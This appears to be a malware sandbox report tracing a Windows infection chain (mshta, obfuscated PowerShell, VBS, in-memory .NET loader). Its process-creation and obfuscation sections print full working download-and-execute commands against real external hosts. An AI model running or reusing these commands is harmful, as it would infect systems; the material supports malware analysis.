IeX($(iEX('[SYsTem.tExT.EnCoDINg]'+[ChAR]0x3a+[ChaR]0x3a+'utF8.GeTSTrING([SystEM.cOnvERt]'+[CHAR]0x3a+[cHAR]58+'FrOMbASe64STrING('+[CHAr]34+'JFM1UFpiNiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZVJERUZpTkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1PTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhwSGhsTndBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFRSdEdKUEJ0ZSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaEFVYVRQUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjTWFReEFTWWhsSyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInhaQm5VRSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNRXNQYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0NzVWlPTklmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRTNVBaYjY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDQuMTY4LjQ2LjI2LzE0MjIvYmVzdG9mdGhpbmdzd2l0aGVudGlyZXRpbWVnaXZlbmVic3R0aGlnbnN0b2Rvd2l0aGdyZWF0LnRJRiIsIiRFblY6QVBQREFUQVxiZXN0b2Z0aGluZ3N3aXRoZW50aXJldGltZWdpdmVuZWJzdHRoaWduc3RvZG93aXRoZy52QnMiLDAsMCk7U3RhclQtc2xFRVAoMyk7SWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXGJlc3RvZnRoaW5nc3dpdGhlbnRpcmV0aW1lZ2l2ZW5lYnN0dGhpZ25zdG9kb3dpdGhnLnZCcyI='+[cHaR]0x22+'))')))"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX BYpaSs -noP -W 1 -C dEViCEcReDEntIaLDEployMENt
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\blaytqul\blaytqul.cmdline"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF818.tmp" "c:\Users\user\AppData\Local\Temp\blaytqul\CSC6824B6AE21FF4F1D9A4E95662E7FF991.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\bestofthingswithentiretimegivenebstthignstodowithg.vBs"
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('2kdimag'+'eUrl = eC4https://3105.filemail.com/api/file/'+'get?filekey=s'+'hTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-'+'dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c eC4;2kdwebClient = New-Object System.Net.WebClient;2kdimageBytes = 2kdwebClient.Dow'+'n'+'loadData(2kdimageUrl);2kdimageText = '+'[System.Te'+'xt.Encoding]::UTF8.GetString(2kdimageBytes'+');2kdstartFlag = eC4<<BASE64_START>>eC'+'4;2kdendFlag = eC4<<BASE64_END>>eC4;2kdstartIndex = 2kdimageText.IndexOf(2kdstartFlag);2kde'+'n'+'dIndex = 2kdimageText.Index'+'Of(2kdendFla'+'g);2kdstartIndex -ge 0 -and 2kdendIndex -gt 2kdstar'+'tIndex;2kdstartIndex += 2kdstartFlag.Lengt'+'h;2kdbase64Length = 2kdendIndex - 2kdstartIndex;2kdbase64Command = 2k'+'dimageT'+'ext.Substring(2kdstartIndex, 2kdbase64Length);2kdbase64Re'+'versed = -join (2kdbase64Command.ToCharArray() syV ForEach-Object { 2kd_ })[-1..-(2kdbase64Command.Length)];2kdcommandBytes = [System.Convert]::FromBas'+'e64String(2kdbase64Reversed);2kdloadedAssembly = [System.Reflection.Assembly]::Load(2kdcommandBytes);2kdvaiMethod = [dnlib.IO.Home].GetMethod(eC4VAIeC4);2kdvaiMethod.Invoke('+'2kdnull, @(eC4txt.FGVGFR/2241/62.64.8'+'61.401//:pttheC4, eC4desativadoeC4, eC4desativadoeC4, eC4desativadoeC4,'+' eC4CasPoleC4, eC4desativadoeC4, eC4desativadoeC4,eC'+'4desativado'+'eC4,eC4desati'+'vadoeC4,eC4desativadoeC4,eC4desativadoeC4,eC4desativadoeC'+'4,eC41eC4,eC4desativadoeC4));') -creplACe ([chAR]115+[chAR]121+[chAR]86),[chAR]124 -RePLAce ([chAR]50+[chAR]107+[chAR]100),[chAR]36 -creplACe'eC4',[chAR]39)| .((gv '*MDr*').NAMe[3,11,2]-jOiN'')"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll, srvcli.dll, netutils.dll, wininet.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, propsys.dll, edputil.dll, windows.staterepositoryps.dll, policymanager.dll, msvcp110_win.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, ntmarta.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, msasn1.dll, amsi.dll, userenv.dll, profapi.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll, kdscli.dll, ncrypt.dll, ntasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, version.dll, kernel.appcore.dll, mscoree.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: version.dll, kernel.appcore.dll, uxtheme.dll, sxs.dll, vbscript.dll, amsi.dll, userenv.dll, profapi.dll, wldp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, msisip.dll, wshext.dll, scrobj.dll, mlang.dll, mpr.dll, scrrun.dll, gpapi.dll, windows.storage.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, msasn1.dll, amsi.dll, gpapi.dll, userenv.dll, profapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, amsi.dll, userenv.dll, profapi.dll, msasn1.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, gpapi.dll, secur32.dll, sspicli.dll, uxtheme.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: winmm.dll, urlmon.dll, wininet.dll, iertutil.dll, srvcli.dll, netutils.dll, iphlpapi.dll, sspicli.dll, mswsock.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll
                    Source: C:\Windows\SysWOW64\mshta.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
                    Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
                    Source: Window Recorder | Window detected: More than 3 window changes detected
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1711723967.000000000754A000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000009.00000002.2098398956.0000000006EB0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2099153712.000000000742A000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: $^q7C:\Users\user\AppData\Local\Temp\blaytqul\blaytqul.pdb source: powershell.exe, 00000001.00000002.1818550362.0000000004BE5000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1713731202.00000000084D2000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000009.00000002.2098398956.0000000006EB0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2099153712.000000000742A000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000009.00000002.2099153712.000000000742A000.00000004.00000800.00020000.00000000.sdmp

                    Data Obfuscation

                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('2kdimag'+'eUrl = eC4https://3105.filemail.com/api/file/'+'get?filekey=s'+'hTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-'+'dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c eC4;2kdwebClient = New-Object System.Net.WebClient;2kdimageBytes = 2kdwebClient.Dow'+'n'+'loadData(2kdimageUrl);2kdimageText = '+'[System.Te'+'xt.Encoding]::UTF8.GetString(2kdimageBytes'+');2kdstartFlag = eC4<<BASE64_START>>eC'+'4;2kdendFlag = eC4<<BASE64_END>>eC4;2kdstartIndex = 2kdimageText.IndexOf(2kdstartFlag);2kde'+'n'+'dIndex = 2kdimageText.Index'+'Of(2kdendFla'+'g);2kdstartIndex -ge 0 -and 2kdendIndex -gt 2kdstar'+'tIndex;2kdstartIndex += 2kdstartFlag.Lengt'+'h;2kdbase64Length = 2kdendIndex - 2kdstartIndex;2kdbase64Command = 2k'+'dimageT'+'ext.Substring(2kdstartIndex, 2kdbase64Length);2kdbase64Re'+'versed = -join (2kdbase64Command.ToCharArray() syV ForEach-Object { 2kd_ })[-1..-(2kdbase64Command.Length)];2kdcommandBytes = [System.Convert]::FromBas'+'e64String(2kdbase64Reversed);2kdloadedAssembly = [System.Reflection.Assembly]::Load(2kdcommandBytes);2kdvaiMethod = [dnlib.IO.Home].GetMethod(eC4VAIeC4);2kdvaiMethod.Invoke('+'2kdnull, @(eC4txt.FGVGFR/2241/62.64.8'+'61.401//:pttheC4, eC4desativadoeC4, eC4desativadoeC4, eC4desativadoeC4,'+' eC4CasPoleC4, eC4desativadoeC4, eC4desativadoeC4,eC'+'4desativado'+'eC4,eC4desati'+'vadoeC4,eC4desativadoeC4,eC4desativadoeC4,eC4desativadoeC'+'4,eC41eC4,eC4desativadoeC4));') -creplACe ([chAR]115+[chAR]121+[chAR]86),[chAR]124 -RePLAce ([chAR]50+[chAR]107+[chAR]100),[chAR]36 -creplACe'eC4',[chAR]39)| .((gv '*MDr*').NAMe[3,11,2]-jOiN'')"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sysTEm32\WInDowSpoWeRShell\V1.0\POwersheLL.exE" "powErsHEll.eXE -EX BYpaSs -noP -W 1 -C dEViCEcReDEntIaLDEployMENt ; IeX($(iEX('[SYsTem.tExT.EnCoDINg]'+[ChAR]0x3a+[ChaR]0x3a+'utF8.GeTSTrING([SystEM.cOnvERt]'+[CHAR]0x3a+[cHAR]58+'FrOMbASe64STrING('+[CHAr]34+'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'+[cHaR]0x22+'))')))"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sysTEm32\WInDowSpoWeRShell\V1.0\POwersheLL.exE" "powErsHEll.eXE -EX BYpaSs -noP -W 1 -C dEViCEcReDEntIaLDEployMENt ; IeX($(iEX('[SYsTem.tExT.EnCoDINg]'+[ChAR]0x3a+[ChaR]0x3a+'utF8.GeTSTrING([SystEM.cOnvERt]'+[CHAR]0x3a+[cHAR]58+'FrOMbASe64STrING('+[CHAr]34+'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'+[cHaR]0x22+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sysTEm32\WInDowSpoWeRShell\V1.0\POwersheLL.exE" "powErsHEll.eXE -EX BYpaSs -noP -W 1 -C dEViCEcReDEntIaLDEployMENt ; IeX($(iEX('[SYsTem.tExT.EnCoDINg]'+[ChAR]0x3a+[ChaR]0x3a+'utF8.GeTSTrING([SystEM.cOnvERt]'+[CHAR]0x3a+[cHAR]58+'FrOMbASe64STrING('+[CHAr]34+'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'+[cHaR]0x22+'))')))"
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('2kdimag'+'eUrl = eC4https://3105.filemail.com/api/file/'+'get?filekey=s'+'hTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-'+'dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c eC4;2kdwebClient = New-Object System.Net.WebClient;2kdimageBytes = 2kdwebClient.Dow'+'n'+'loadData(2kdimageUrl);2kdimageText = '+'[System.Te'+'xt.Encoding]::UTF8.GetString(2kdimageBytes'+');2kdstartFlag = eC4<<BASE64_START>>eC'+'4;2kdendFlag = eC4<<BASE64_END>>eC4;2kdstartIndex = 2kdimageText.IndexOf(2kdstartFlag);2kde'+'n'+'dIndex = 2kdimageText.Index'+'Of(2kdendFla'+'g);2kdstartIndex -ge 0 -and 2kdendIndex -gt 2kdstar'+'tIndex;2kdstartIndex += 2kdstartFlag.Lengt'+'h;2kdbase64Length = 2kdendIndex - 2kdstartIndex;2kdbase64Command = 2k'+'dimageT'+'ext.Substring(2kdstartIndex, 2kdbase64Length);2kdbase64Re'+'versed = -join (2kdbase64Command.ToCharArray() syV ForEach-Object { 2kd_ })[-1..-(2kdbase64Command.Length)];2kdcommandBytes = [System.Convert]::FromBas'+'e64String(2kdbase64Reversed);2kdloadedAssembly = [System.Reflection.Assembly]::Load(2kdcommandBytes);2kdvaiMethod = [dnlib.IO.Home].GetMethod(eC4VAIeC4);2kdvaiMethod.Invoke('+'2kdnull, @(eC4txt.FGVGFR/2241/62.64.8'+'61.401//:pttheC4, eC4desativadoeC4, eC4desativadoeC4, eC4desativadoeC4,'+' eC4CasPoleC4, eC4desativadoeC4, eC4desativadoeC4,eC'+'4desativado'+'eC4,eC4desati'+'vadoeC4,eC4desativadoeC4,eC4desativadoeC4,eC4desativadoeC'+'4,eC41eC4,eC4desativadoeC4));') -creplACe ([chAR]115+[chAR]121+[chAR]86),[chAR]124 -RePLAce ([chAR]50+[chAR]107+[chAR]100),[chAR]36 -creplACe'eC4',[chAR]39)| .((gv '*MDr*').NAMe[3,11,2]-jOiN'')"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sysTEm32\WInDowSpoWeRShell\V1.0\POwersheLL.exE" "powErsHEll.eXE -EX BYpaSs -noP -W 1 -C dEViCEcReDEntIaLDEployMENt ; 